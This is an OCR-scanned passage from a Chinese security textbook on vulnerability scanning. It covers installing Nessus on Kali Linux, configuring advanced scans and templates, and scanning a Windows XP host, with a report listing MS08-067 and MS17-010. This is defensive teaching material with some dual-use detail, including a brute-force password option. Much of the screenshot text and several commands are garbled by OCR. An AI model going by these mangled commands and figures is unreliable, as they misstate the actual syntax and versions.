(7) 以 CERT-Bund 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CERT-Bund Advisories 菜单 
命令 ， 在 打开 的 下 图 所 示 的 界面 中 列 出 了 使 用 CERT-Bund 参考 标准 展示 的 漏洞 图 表 ， 
以 及 漏洞 数量 。 


CERTBund Advisories (9209 of 9209) 


WAS T2345s670910 | 


(8) 以 DFN-CERT 参考 标准 展示 漏洞 图 表 功 能 。 选 择 DFN-CERT Advisories 菜单 命令 ， 
在 打开 的 下 图 所 示 的 界面 中 列 出 了 使 用 DFN-CERT 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 
数量 。 


[ees 
|_ © DFN-CERT Advisories (18721 of 18721) 


a 
MA0 12345678910 


@ 移 提示 : 可 以 通过 每 个 界面 中 的 查询 ， 查 询 出 某 个 漏洞 在 该 评分 标准 中 的 信息 。 


号 12.5 “使 用 Nessus 扫 描 漏 洞 


Nessus 是 目前 使 用 最 为 广泛 的 系统 漏洞 扫描 与 分 析 软件 ， 该 工具 提供 了 完整 的 漏洞 扫 
描 服务 ， 并 随时 更 新 漏洞 数据 库 。Nessus 不 同 于 传统 的 漏洞 扫描 软件 ， 可 同时 在 本 机 或 远 
端 进行 系统 的 漏洞 扫描 分 析 。 
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在 使 用 Nessus 扫 描 系 统 漏洞 之 前 ， 首 先 需 要 下 载 Nessus 软 件 ， 具 体操 作 步 又 如 下 : 


到 Nessus 软 件 ， 如 下 图 所 示 。 


step 国 在 浏览 器 的 地 址 栏 中 输入 网 址 https://www.tenable.com/downloads， 在 下 载 页 面 中 找 


Downloads 


Nessus 


Download Nessus and Nessus Manager. 


单 击 Nessus 会 跳 转 到 Nessus 软 件 下 载 界 面 ， 如 下 图 所 示 。 


Nessus 


Need an Activation Code? 


In order to complete your Nessus instollation, you need an activation code if you dont have one atready 


Binary download fles for Nessus Professional, Nessus Manager and connecting Nessus Scanners to Tenablejo & SecurityCenter, 


[sep 国 Nessus 家 用 版 是 免费 的 ， 但 是 也 需要 
注册 获取 注册 码 ， 单 击 Get Activation Code 
按钮 ， 跳 转 到 版 本 界面 ， 如 下 图 所 示 。 


Free 


Nessus® Home allows you to scan your personal home network with the 
same powerful scanner anjoyed by Nessus subscfibers 


For Home Users 


Scan 16 ps 
Nessus Home features: 


High-speed, accurate assessment with thousands of checks 


Agentless scanning of home networks 


EE 


单 击 Register Now 按 钮 ， 跳 转 到 注册 
界面 ， 如 下 图 所 示 。 


Register for an Activation Code 
FirstName* Last Name* 


Email * 


口 Checkto receive updatesfrom Tenable 


[step 图 在 注册 界面 中 ， 给 入 用 户 名 与 邮箱 
地 址 ， 单 击 Register 按 钮 ， 会 提示 注册 码 已 
发 送 至 你 的 邮箱 ， 然 后 会 出 现 一 个 下 载 按 
钮 ， 如 下 图 所 示 。 


Download Nessus 


To download Nessus, visit the Nessus 
Download page. 


登录 邮箱 会 发 现 Nessus 发 送 的 激活 
码 ， 如 下 图 所 示 。 


enable 


Nessus Home Evaluation 


Welcome to Nessus Home and congratulations on taking action to secure 
your personal network! We offer the latest plugins for vulnerability scanning 
today, helping you identify more vulnerabilities and keep your personal 
Network protected. 


Ifyou use Nessus in a professional capacity and want advanced capabilities 
such as unlimited assessments, or the ability to perform compliance checks 
or content audits, Nessus Professional may be better suited to your needs. 
To learn more view the Nessus Professional datasheet or request a fiee 


evaluation 


Activating Your Nessus Home Subscription 


Your activation code fr Nessus Home fe: 
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lstep 图 输入 uname -a 命令 查看 kail 内 核 信 
息 ， 以 选择 需要 下 载 哪 个 版 本 的 Nessus 软 
件 ， 如 下 图 所 示 。 

ee 沽 Uname -a 


inux kali 4.18.6-kati2-amd64 #1 SMP Debian 4.18.16-2katil 
(2618-16-69) x86 64 GNU/Linux 


[step 图 根据 自己 的 系统 选择 相应 的 版 本 。 
这 里 选择 Debian 系 统 类 型 的 版 本 ， 如 下 图 
所 示 。 


tp Nessus-0.00-deblans Basdeb Deblan &, 7, 68,9/ Kall Une 1, 2017 Checksum 
Nessus-g00dmg Chedksom 
Nessus-8.0.0-e55.385 rom Checkser 
Nessus-80.0-amanxg6 hrpm Checksen 
op Nossus-8.0.0-058AB0 GDIN ec 

di 


step 国 选择 版 本 后 会 弹出 一 个 许可 协议 ， 单 
击 IAgree 按 钮 ， 如 下 图 所 示 。 


License Agreement 


step 轿 浏览 器 会 弹出 一 个 打开 还 是 保存 文件 
的 信息 提示 ， 这 里 选择 保存 ， 单 击 OK 按 钮 
即 可 开始 下 载 并 保存 Nessus 软 件 ， 如 下 图 
所 示 。 


Opening Nessus-8.0.0-debian6_amd64.deb © 
You have chosen to open: 
Nessus-8.0.0-deblan6_amd64.deb 


whichis: Deblan 软件 包 (63.8 MB) 
trom: https://lenable-downloads-production's3.amazonaws.com 


What should Firefox do with this file? 


ith | 归档 管理 器 (default) ~ 


12.5.2 ”安装 Nessus 软 件 


Nessus 软 件 下 载 完成 后 ， 
了 。 具 体操 作 步 又 如 下 : 
[step 图 切换 到 Nessus 安 装 包 目录 ， 使 用 
dpkg -i Nessus-8.0.0-debian6 amd64.deb 命 
令 ， 执 行 安装 ， 执 行 效果 如 右上 图 所 示 。 
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安装 完成 会 提示 用 于 登录 管理 界面 的 网 络 
地 址 。 


FatERSUIS-7DONNTGSGSF dpkg “1 NE5505-8-976-GeDI5n6_ and6d. deb 
正在 选中 未 先 择 的 软件 包 nessus。 

(( 正 在读 可 数据库 ..。 系统 当前 共 安装 有 379781 个 文件 和 目录 。) 
准备 解压 Messus-8.6.9-debian6_and64.deb ... 

正在 解压 nessus (8.6.0] .… 

正在 设置 nessus (8.6.6) 

unpacking Nessus scanner core Components... 


- You can start Nessus Scanner by typing /etc/init.d/nessusd start 
- Then go to https://kali;:8834/ to configure your scanner 


正在 处 理 用 于 systemd [239-19| 的 触发 器 ..。 


[step 图 使 用 /etc/init.d/nessusd start 命 令 ， 启 动 
Nessus。 执 行 效果 如 下 图 所 示 ， 说 明 Nessus 
已 经 启动 。 


root@kali: -~/Downloads# /etc/init.d/nessusd stard 
Starting Nessus : . 


step 图 在 网 页 浏览 器 中 输入 https://kali: 
8834” 网 址 ， 打 开 Nessus 网 页 管理 界面 。 首 
次 打开 会 提示 网 页 没有 安全 证 书 ， 如 下 图 
所 示 。 


ed her website mproperty. Teprolectyourinforration from boing stolen, Freforhas 


rors be he to relp Man denahyand bloch matcous cars 


Er 


单 击 Advanced 按 钮 ， 进 入 如 下 图 所 示 
的 高 级 选项 页 面 。 


Add Exceptlon, 


[sep 图 在 高 级 选项 页 面 中 ， 单 击 Add 
Exception 按 钮 ， 添 加 证 书 为 可 信 ， 然 后 单 
击 Confirm Sercurity Exception 按 钮 ， 获 取证 
书 ， 如 下 图 所 示 。 

Add Security Exception © 
[De 


Legitimate banks stores, andother public sites will not ask youto dothis. 
Serer 


ss [ wrenasn 


Centifcate Status 
This site attempts to identify itsetf with invatidinformation 


nerowntaenbty 


The certificate ls not trusted because lt posmt been venmed as seved by a trusted authorty. 


eermanenthy store this exception 


Confirm Securiy Excepton Cancel 


Step 图 首次 登录 需要 先 注册 一 个 管理 员 账 
号 。 下 图 为 管理 员 注 册 界 面 。 


Nessus 


Create an account 


step[ 在 管理 员 注 册 界 面 中 ， 输 入 完 用 户 命 
与 密码 ， 单 击 Continue 按 钮 ， 跳 转 到 注册 激 
活 界面 ， 输 入 邮箱 获取 的 激活 码 ， 如 下 图 
所 示 。 


Nessus@ 


Register your scanner 


Scamer Type 


Home. Protassional or Manager 


Activallon Code * 


Policies 


CE 


Policles allow you to create custom templates defining what actions are performed during a scan. Once 
created, they can be selected from the list of scan templates. From this page you can view, create, 
import, download, edit, and delete policies. 


Create a new pollcy 
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step 图 激活 以 后 Nessus 会 初始 化 目前 的 漏洞 
检测 库 ， 如 下 图 所 示 。 


Nessus@ 


Initializing 


[step 图 等 待 漏洞 检测 库 更 新 完成 后 ， 登 录 并 
进入 主 界面 ， 如 下 图 所 示 。 


My Scans pr Now Fo 


侈 注意 : Nessus 与 OpenVAS 不 同 ，Openvas 
在 进行 扫描 之 前 需要 一 个 配置 、 定 义 一 个 
主机 、 创 建 一 个 任务 然后 才能 进行 扫描 ， 
而 Nessus 则 是 选择 不 同 的 策略 。 


step 贺 在 首页 中 选择 左 侧 的 Policies 选 项 ， 进 入 策略 项 界面 ， 如 下 图 所 示 。 


Co oe | 


step 图 首次 进入 是 没有 创建 策略 的 ， 这 里 需要 先 创建 一 个 策略 ， 单 击 New Policy 按 钮 ， 创 
建 一 个 新 的 策略 。 用 户 也 可 以 在 打开 的 下 图 所 示 界 面 中 选择 Nessus 给 出 的 策略 模板 。 


[Poficy Templates 


« Back to Policles 


Scanner 


六 A [a x 小 
Advanced Scan Audit Cloud AN Badlock Detection Bash Si 


hellshock Detection Basic Network Scan 
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( 斧 提 示 : Nessus 默 认 提供 了 很 多 策略 模 
板 ， 选 择 相应 的 模板 即 可 ， 当 然 它 是 一 
个 商业 版 漏洞 扫描 器 ， 因 此 有 一 些 模板 
是 收费 的 ， 凡 是 右上 角 注 有 upgrade 字 样 
的 都 需要 升级 到 专业 版 及 以 上 版 本 才 可 
以 使 用 。 


解 每 一 项 的 作用 对 于 配置 适合 的 扫描 类 型 
有 多 大 帮助 。 

高 级 扫描 设置 的 操作 步骤 如 下 : 
[step 图 在 Policy Templates 设 置 界 面 中 选择 
Advanced Scan 选项 ， 进 入 Advanced Scan 设 
置 界 面 ， 如 下 图 所 示 。 


New Policy / Advanced Scan 
< Back to Policy Templates 


12.5.3 ”高 级 扫描 设置 

高 级 扫描 (Advanced Scan) 是 Nessus 
提供 的 一 个 针对 所 有 网 络 设 备 的 基础 扫 
描 ， 其 他 类 型 的 扫描 都 是 基于 它 的 扩充 或 
者 修改 。 高 级 扫描 中 有 很 多 的 设置 项 ， 了 


BASIC 


Setings Credentials Complance Plugins | 


[step 图 在 基础 (BASIC) 信息 设置 界面 中 ， 
可 以 输入 名 字 ， 以 及 一 些 描述 信息 ， 如 下 
图 所 示 。 


Name 
General 


Pei 
Descnpton 

pscoveny 

ASSESSMENT 

EPORT 


ADVANCED 


选择 DISCOVERY (权限 ) 选项 ， 该 选项 提供 有 3 个 子 选项 ， 包 括 Host Discovery ( 主 
机 发 现 ) 、Port Scanning (端口 扫描 ) 、Service Discovery (服务 发 现 ) ， 如 下 图 所 示 。 


pscoveny 
Host Discovery 
Por Scanning 
Servlce Discovery 

ASSESSMENT 

REPORT 


ADVANCED 


选择 Host Discovery 选 项 ， 在 打开 的 界面 中 可 以 设置 Ping 远 程 主机 的 方法 ， 包 括 两 
项 ， 第 1 项 表示 本 机 在 测试 范围 之 内 ， 第 2 项 为 快速 网 络 发 现 。 如 果 远 程 主机 发 送 Ping 包 ， 
Nessue 为 了 避免 误 报 会 执行 其 他 操作 来 验证 ， 如 下 图 所 示 。 


me 下 本 
Remote Host Ping 


NscoVEAY 


Ping the remote host ® 


General Settings 


Testthe local Nessus hesi 


DVANCED Use fast network discovery 


移 提 示 : Ping 包 的 模式 选择 ， 如 下 图 所 示 。 这 里 可 以 选择 多 种 协议 类 型 ， 包 括 ARP、 
TCP、ICMP 及 UDP 等 。 由 于 UDP 测试 并 不 是 很 准确 ， 所 以 这 里 默认 并 没有 选择 ， 但 是 仍 
然 提供 有 该 选项 。 
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Destination pons buitn 


< 


ICNP 
Assume ICMP urreachable tom the gateway means the nost Is dam 
Maximum number of ratres 


UDP 


[sep 固 比较 脆弱 的 网 络 设备 有 3 个 选项 可 供 
选择 ， 包 括 是 否 有 共享 打印 、 扫 描 网 络 设 
备 、 扫 描 网 络 控制 设备 ， 如 下 图 所 示 。 


ragile Devices 


Scan Network Printers 
Scan Novell Netware hosts 


Scan Operatlonal Technology devlced 
设置 局 域 网 唤醒 选项 ， 可 以 加 入 含有 
MAC 地 址 表 的 文件 ， 以 及 唤醒 等 待 时 间 ， 
这 里 以 分 钟 为 单位 ， 如 下 图 所 示 。 

ake-on-CLAN 


List of MAC addresses Add File 


Boot time walt (in minutes) 


选择 端口 扫描 ， 进 入 端口 过 滤 设置 
界面 ， 如 果 选 中 Consider unscanned ports as 
closed 复 选 框 ， 则 扫描 的 端口 将 视 为 关闭 不 再 
进行 扫描 ， 这 里 建议 不 选中 ， 如 下 图 所 示 。 


| 


RSIC 
Pors 
piscoveRY > 
Conslder unscanned ports as closed 
Host Discovery 
Por Scanning Port scan range: default 


Service Discovery 
本 地 端口 集合 设置 界面 ， 这 里 优先 检 
查 SSH、WMI、SNMP 这 些 服务 端口 ， 只 有 
当 本 地 端口 枚 举 失 败 后 才 运行 网 络 端口 扫描 
程序 。 最 后 一 项 默认 没有 义 选 ， 它 用 于 验证 
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本 地 所 有 打开 的 TCP 端 口 ， 如 下 图 所 示 。 


ca merators 


局 ssh netstad 

lv WMI (netstat) 

lw SNMP 

lv Only run network port scanners if local port enumeration failed 

Verfy open TCP ports found by local port enumerators 
[step 图 网 络 端口 扫描 使 用 默认 的 SYN 包 进 
行 检 测 ， 如 果 需 要 进行 防火 墙 过 滤 检 测 可 
以 选中 下 方 的 Override automatic firewall 
detection 选 项 ， 这 里 给 出 了 3 个 模式 : 默认 
简单 检测 (Use soft detection) 、 主 动 检 
测 (Use aggressive detection) 、 禁 用 检测 
(Disable detection) ， 如 下 图 所 示 。 


NeIWOTK Por SCanners 


v SYN 


Overide automatlc firewall datectlon 


选择 服务 发 现 选项 ， 探 测 所 有 端口 以 
查找 服务 ， 尝 试 将 每 个 开放 端口 映射 到 该 
端口 上 运行 的 服务 ， 如 下 图 所 示 。 

General Settings 


V Probe all ports to find services 


注意 ， 在 一 些 罕见 的 情况 下 ， 这 可 
能 会 中 断 一 些 服 务 ， 并 导致 不 可 预见 的 副 
作用 。 

[step 图 搜索 SSL/TLS 服 务 界面 ， 默 认为 打开 
状态 ， 可 以 选择 只 搜索 SSL/TLS 服 务 ， 或 搜 
索 所 有 端口 ， 识 别 是 否 有 快 过 期 的 证 书 ， 
默认 选择 枚 举 所 有 SSL/TLS 密 码 ， 启 用 CRL 
检查 〈 连 接 到 Intermet) ， 如 下 图 所 示 。 


earch for SSUTLS services ® 
Known SSUTLS ports 


Searchfor SSUTLS on 


Known SSUTLS ports 


ldentify certifcates expiing within 
Al ports 


可 Enumerate al SSLTLS ciphers 


Enable CRL checking (connects to the Intemel) 
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[step 图 在 Accuracy 界 面 中 可 以 进行 准确 性 设 
置 和 执行 彻底 扫描 ， 其 中 准确 性 有 两 项 可 
选 ， 第 1 项 避免 可 能 存在 的 虚假 报警 ， 第 2 
项 显示 出 可 能 存在 的 虚假 报警 ， 执 行 彻底 
的 测试 ， 这 个 存在 一 定 风险 ， 可 能 破坏 网 
络 或 影响 扫描 速度 ， 如 下 图 所 示 。 

| 


Overde normal accuracy 


| Perlorm thorough tests (may disrupt your network or impact scan 


spesd) 
step 图 在 Antivirus 与 SMTP 界 面 中 ， 可 以 对 
反 病 毒 定义 宽 限期 (以 天 计 )， 可 以 对 邮件 
设置 域名 、 服 务 器 地 址 等 ， 如 下 图 所 示 。 
Antivirus 


Antivius definition grace perlod (n days); 0 ~ 


BMTP 


[Third party domain example.com 


From address nobody@example.com 


[To address postmaster@[AUTO_REPLACED_IP] 


[sep 贺 在 General Settings 与 Oracle Database 
设置 界面 中 ， 可 以 设置 用 户 默认 提供 的 赁 
证 ， 如 果 用 户 的 密码 策略 设置 为 在 多 次 无 
效 尝试 后 锁定 账户 ， 则 用 于 防止 账户 锁 
定 ， 使 用 Oracle 数 据 库 测 试 默认 账户 可 能 会 
比较 慢 ， 如 果 有 需要 也 可 以 选择 ， 如 下 图 
所 示 。 


SonoTal Sottings 


2 Only use credentals provided by the user 


( 侈 提示 : Nessus 启 用 了 Hydra (在 线 密码 
破解 ) 工具 配合 生成 密码 规则 ， 如 下 图 所 
示 。 这 里 可 以 导入 登录 账号 文件 ， 登 录 密 
码 文件 等 ， 并 设置 并 行 任务 数量 、 超 时 时 
间 、 尝 试 空 密码 、 尝 试 以 密码 登录 、 在 第 
一 次 成 功 后 停止 暴力 强迫 、 测 试 默 认 账 户 
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人 移 注 意 : Nessus 还 具有 其 他 高 级 扫描 设置 
选项 ， 这 里 不 再 详细 介绍 ， 用 户 可 以 自行 
安装 该 软件 后 ， 然 后 打开 该 软件 的 设置 界 
面 ， 从 中 学 习 各 个 设置 选项 的 作用 。 


12.5.4 其 他 扫描 项 


Nessus 除 了 提供 高 级 扫描 以 外 ， 还 设置 
了 一 些 其 他 个 性 扫描 ， 这 些 个 性 扫描 有 的 
是 针对 特殊 漏洞 ， 有 的 是 针对 不 同 设备 。 


1. Balock Detection 漏 洞 


Badlock Detection 是 一 种 “协议 /中 间 
人 ”攻击 漏洞 ， 可 用 模拟 Windows AD 〈 通 
过 批量 创建 和 编辑 用 户 账户 ， 指 派 管理 权 
限 等 ) 已 验证 的 用 户 身 份 发 动 攻击 。 在 此 
种 攻击 中 ， 攻 击 者 可 被 授予 读 写 SAM 数 
据 库 的 权限 ， 可 能 造成 所 有 用 户 名 密码 和 
其 他 潜在 敏感 信息 泄露 。 漏 洞 编 号 CVE- 
2016-2118 和 CVE-2016-0128， 在 Nessus 扫 
描 模板 中 图 标 如 下 图 所 示 。 


EE 


| 
| 
| 
| 
| 
| 
Badlock Detection | 
| 
| 
| 
| 


针对 Badlock Detection 漏 洞 ，Nessus 提 
供 的 扫描 插件 ， 如 下 图 所 示 ， 这 里 只 列 出 
了 部 分 ， 具 体 请 参考 软件 本 身 ， 其 他 扫描 
类 型 的 插件 也 同样 截取 部 分 。 


Setngs Clecemals plugine < 


PLUGIN Faway 


CertOS Local Securly Checks 
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To PLUGN Neme 


RLuGINID 


Certos 5 samba [CESA-2016.0621) (Badiock) soas2 

FreeBSD Local Securty Checks 本 Cartos 5: sambaGy (CESA-2015.0513) Badioch sos 

Genera 1 Certos 517: ipa/ hbb / Hbtalloc / btdb / ttevent / openchange | samba .© S0450 

Ms 1 Cartos 5: samba [CESA 2016:0611) (Badicel) oo449 
< 


2. Bash Shellshock Detection 漏 洞 


Bash Shellshock Detection 漏 洞 ， 又 称 为 破 壳 漏洞 ， 会 影响 目前 主流 的 Linux 和 Mac OSX 
操作 系统 平台 。 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Bash Shellshock Detection 


针对 破 过 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


sotings Cieoemials plugins < 

PLUGIN FANEY TomL Fuemio ~ 
Certos Local Secunty Checks 17 -besh (CESA-2014 1295) (Shadkshoch) T7835 

Col abuses 51617; besh (CESA-2014:1306) T7679 
Dealan Local 

Fedora Local 


FieeBsD Local Seounty Checks 
FT 1 
Gan a shel lomorey 


General 3 


3. Basic Network Scan 


Basic Network Scan， 基 础 网 络 设备 扫描 。 这 里 针对 基础 网 络 设 备 ， 比 如 Windows 系 
统 、Linux 系 统 、 路 由 器 、 交 换 机 等 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


处 


Basic Network Scan 


针对 基础 网 络 设备 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Setings Crodentas Plugins © 
PuuGm ram TomL 上 国 rucwww puucwo 目 
Amazon Linu Local Securiy Checks la54 了 Chort TuxChoreSyetem ActiveX Inetalcient) Method Aritray MSI pa .S8221 
Bachdoor 了 4 3CTIpSvc Long Transpor Mece Remate Overtow 23735 
Brute force atacks 四 20DFTP Mupe Drsctory Taversal Vnoranlities a3218 
Certos Local Securky Cnecks 6568 20Grectngs Playor Actvex Mutipe Butier Cveriows 26020 
Col abuses Ed 3vx MPEG4 < 5.0.2 Bufle Oveflon 29749 
Col abuses : XSS 6 7zp< 1600 Multiple vunanbimies 912a0 
asco S52 7.2p < 1603 NULL Painier Derelerence Dos 109799 


4. Credenticled Patch Audit 


Credenticled Patch Audit， 补 丁 扫描 。 主 要 是 针对 不 同 设备 更 新 补丁 的 一 个 扫描 ， 在 
Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Credentialed Patch Audit 


针对 网 络 设备 补丁 扫描 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Sotings Crodontas plugine © 
PLUGIN FaMtY To 国 mucwnwc mvcwip 卜 
Amazon Linux Local Securiy Checks 54 AIX 51 IY20498 22373 
ContOS Local Secunty Checks 6568 A S51 Iy21200 22374 
asco 62 AMX 531:IY2: 22375 
Databoaes s05 AIX 51: IY22288 22376 
Dekian Local Securty Checks sp22 AIX 51 IY23041 22377 
FS Networhs Local sect 7 AIX 51: IY23946 22378 
Fodora Local Seoutty checks 12861 AIX S1: IY23947 22379 


5. Intel AMT Security Bypass 


Intel AMT Security Bypass 针 对 Intel 一 款 远 超 控制 功能 的 芯片 漏洞 扫描 ， 在 Nessus 扫 描 
模板 中 的 图 标 如 下 图 所 示 。 


Intel AMT Security Bypass 


针对 Intel 芯 片 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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PuGIN Fan a pennme penp 

Seangs ie Aumeneeanon aypass (NTEL-SA-00075) (ramate. 

Web Sarver: Intel Management Engne irsecure Raca / Wnte Operatons RCE (INTEL'S... 97098 
noows 


6. Malware Scan 
Malware Scan， 恶 意 软件 扫描 。 该 功能 主要 是 用 于 对 已 知 恶 意 软 件 添 加 特征 ， 通 过 这 些 
特征 比 对 判断 目标 主机 是 否 存在 相应 恶意 软件 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


© 


Malware Scan 


针对 恶意 软件 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Puucwi 


Windows :User managemert 


7. Shadow Brokers Scan 
Shadow Brokers Scan， 代 理 漏洞 扫描 。 该 扫描 主要 针对 本 地 或 远程 代理 存在 的 漏洞 ， 
在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Shadow Brokers Scan 


针对 代理 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Seting Credertias Plugins 


PLucm FANLY Puuemm ~ 
centos Local secumy checks aaazg 
cel shuses 21841 
clsco 22450 
Deaian Loc: 2la23 


FieeBSD Local Securiy Checks 


8. Spectre and Meltdown 漏 洞 

Spectre and Meltdown 漏 洞 ， 幽 灵 与 熔断 漏洞 ， 芯 片 级 安全 漏洞 。Spectre 中 文 名 “ 幽 
灵 ”， 有 CVE-2017-5753 和 CVE-2017-5715 两 个 变 体 ，Meltdown 中 文 名 “熔断 ”， 有 CVE- 
2017-5754 一 个 变 体 ， 在 Nessus 扫 描 模 板 中 的 图 标 如 下 图 所 示 。 


壤 


Spectre and Meltdown 


针对 幽灵 与 熔断 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Puonp ~ 


TomL 国 rucnwws 
7 | A $.3 TL 12: spoctre_ motoown (03029) Mokgown) (Spoctrs) oa 


106311 


9. WannaCry Ransomware 

WannaCry Ransomware， 勒 索 病毒 扫描 。 该 扫描 主要 针对 永恒 之 蓝 勒 索 类 病毒 的 一 个 
扫描 ， 可 以 选择 提供 Windows 账 号 密码 ， 这 样 通过 WMI 进 行 测试 ， 列 举 存在 哪些 软件 更 
新 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


四 


WannaCry Ransomware 


针对 勒索 病毒 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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seangs Ciecemials plugins 
PLUGINFAMEY » 
Setiings 
Windows 


Windows : Microsoft Buletins 


Mom ~ pucwNeme 
1 Waicinus Process Detaction 
4 MS17-010: Securty Update for Microsoft Windons SMB Semver (4013339) ( 


Server Message Block [SM3) Protocol Version 1 Enebled 


SMB Sever DOUBLEPULSAR Backdoor / implant Dexection (EtemaRackes) 


Puuemi 


5e275 


57833 


S7065 


EP] 


10. Web Application Tests 


Web Application Tests，Web 应 用 渗透 扫描 。 该 扫描 主要 针对 网 络 应 用 的 渗透 测试 ， 在 


Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Web Application Tests 


针对 网 络 应 用 渗透 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Sanngs Ciecomals plugin < 


PLua FAN 
cGlabuses 

col abuses : XSS 
Satings 


‘Web Severs 


12.5.5 ”开始 扫描 漏洞 


TomL Puucm Nawe 
aa4 csh 
es Sventnes Dsclosed via Wed Server 

2BGal dsp_alpum php id_abum Parameter SQL nlection 
1108 2Com Network supevcer Traversel Arbitray Fle Accesa 


3Com Weo Managemert Interface Defaut Credentiats 


Remate Buner ovemon 


Pp semplate Parameter Traversal Local Fle inelusl 


FLuGNID 


es346 


29821 


16046 


19939 


7al90 


8212 


21020 


本 小 节 使 用 Nessus 从 创建 新 的 扫描 开始 ， 建 立 一 个 完整 的 扫描 直到 最 后 的 漏洞 报告 。 
创建 一 个 完整 的 扫描 需要 以 下 几 个 步骤 : 
创建 新 的 扫描 ， 这 里 选择 高 级 扫描 项 ， 基 础 设置 中 输入 一 个 扫描 的 名 称 以 及 目标 地 


址 ， 如 下 图 所 示 。 


Setings -Cradentias 


DIscOVERY 
ASSESSMENT 
pEponT 


ADWANCED 


Complance 


Plugins 


WindowXP 


My Scans 


192.168.1103 
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step 图 这 里 以 Windows XP 系统 来 测试 ， 在 凭证 中 选择 Windows 输 入 一 个 账号 密码 ， 如 下 图 
所 示 ， 这 样 Nessus 会 登录 到 系统 提供 更 全 面 的 一 个 扫描 ， 其 中 也 包括 勒索 病毒 扫描 。 如 果 
是 在 Linux 系 统 下 选择 SSH，Nessus 还 支持 其 他 更 多 的 登录 ， 如 邮件 服务 器 、 数 据 库 等 会 根 


Setings Crodentials Compiance Plugns 


添加 完 账号 后 下 方 有 一 个 全 局 设置 ， 
其 中 包括 4 项 ， 如 右 图 所 示 。 

(1) 不 以 明文 的 方式 传输 账号 密码 ， 
避免 因为 网 络 嗅 探 造成 账号 密码 泄露 。 

(2) 不 以 NTLMV1 的 方式 验证 默认 ， 
会 使 用 v2 的 方式 验证 。 

(3) 开启 远程 注册 表 扫 描 ， 扫 描 结 束 
后 会 自动 关闭 。 

(4) 在 扫描 期 间 开 启 网 络 共享 扫描 ， 
扫描 结束 后 会 自动 关闭 。 


Setings Credartials Compliance 


Wndows 


Global Credential Settings 


Ne and read nia Ghee 
w DonotuseNTLMvI authentication 
v) Start the Remote Reglsty service during the scan 
vv Enable administrative shares during the scan 
step 园 合 规 性 设置 ， 如 果 已 知 目标 主机 操作 
系统 类 型 ， 可 以 从 这 里 进行 设置 ， 还 可 以 
选择 不 同 的 应 用 ， 这 里 选择 Windows XP 系 
统 ， 如 下 图 所 示 。 


Piugins 


Os Wndows xp va1 


DISA Windows Server 2008 MS STIG v6r41 
DISA Wndows server 2008 R2 CC sma 
DISA Windows server 2008 Ra NS STIG 
DISA Windows server 2012 and 2012 22 
DISA windbws Server 2012 and 2012 2 


TI 


Step 图 选择 完成 后 单 击 Save 按 钮 ， 将 所 有 的 设置 保存 ， 在 扫描 中 可 以 看 到 新 创建 的 扫描 任 
务 ， 如 下 图 所 示 。 


[vy soars Co | 
有 i 
a ep 


step 罗 如 果 不 需要 定时 任务 ， 直 接 单 击 最 右 侧 的 类 似 播放 的 一 个 三 角形 图 标 按钮 ， 便 可 以 
启动 扫描 ， 如 下 图 所 示 。 
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a 


Last Modified Y 


Today at 3:29 AM 


step 攻 扫描 完成 后 ， 可 以 单 击 该 扫描 项 跳 转 到 扫描 结果 页 面 ， 如 下 图 所 示 。 这 里 会 列 出 详 


细 的 扫描 信息 ， 并 且 以 不 同 颜色 标注 出 各 种 威胁 程度 的 漏洞 数量 。 


rr 

ee i 

oa [ 
放 
的 
.em 
We 
2 


cit 
Hon 
edu 
un 
bo 


导出 ， 如 下 图 所 示 。 


Configure 


说 明 ， 以 及 修补 方法 。 


单 击 Export 右 侧 的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 可 以 选择 将 扫描 结果 以 哪 种 形式 


Audit Trall Launch 


Expon ~ 


Nessus 


PDF 
HTML 
csv 


Nessus DB 


以 生成 PDF 格 式 为 例 ， 生 成 的 扫描 报告 如 下 图 所 示 。 这 里 会 列 出 每 一 种 漏洞 的 详细 


192.168.1.102 


Sevemrm evss 


100 


NA 


NA 


OAuthentication Falure(s) for Provided Credentials 


Total: 34 
we 

MS08-067: Microsoft Windows Server Seryce Cmhted RPC Request 
Handing Remote Code Executon (958644) (ECLIPSEDWING) 
naedentialed check) 


MS09-001: Microsoft Windows SMB Vulnerabiites Remote Code Execution 
(58687) (uncredentialed check) 


MS17-010: Securty Update for Microsoht Windows SMB Sever (4013389) 
(ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) 
(ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (moredentialed 
hec 

Mcrosoft Windows XP Unsupported Instalation Detection 

Unsupported Windows OS 

Marosoht Wndows SMB NULL Sesson Authenticaton 

SMB Signing not required 


Authentcation Faiure - Local Checks Not Run 


Common Plattorm Enumeration (CPE) 
Device Type 
Eihemet Card Manulaqurer Detection 


Eihemet MAC addresses 
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系统 漏洞 的 安全 防护 


要 想 防范 系统 的 漏洞 ， 首 先 要 及 时 为 
系统 打 补 丁 ， 下 面 介绍 几 种 为 系统 打 补 丁 
的 方法 。 


12.6.1 及 时 更 新 系统 


Windows 更 新 是 系统 自 带 的 用 于 检测 
最 新 系统 的 工具 ， 使 用 Windows 更 新 可 
以 下 载 并 安装 系统 更 新 ， 具 体 的 操作 步骤 
如 下 。 
单 击 “ 开 始 ” 按 钮 ， 在 打开 的 “ 开 
始 ” 菜 单列 表 中 选择 “设置 ”菜单 项 ， 如 
下 图 所 示 。 


更 12.6 


文件 资源 管理 器 


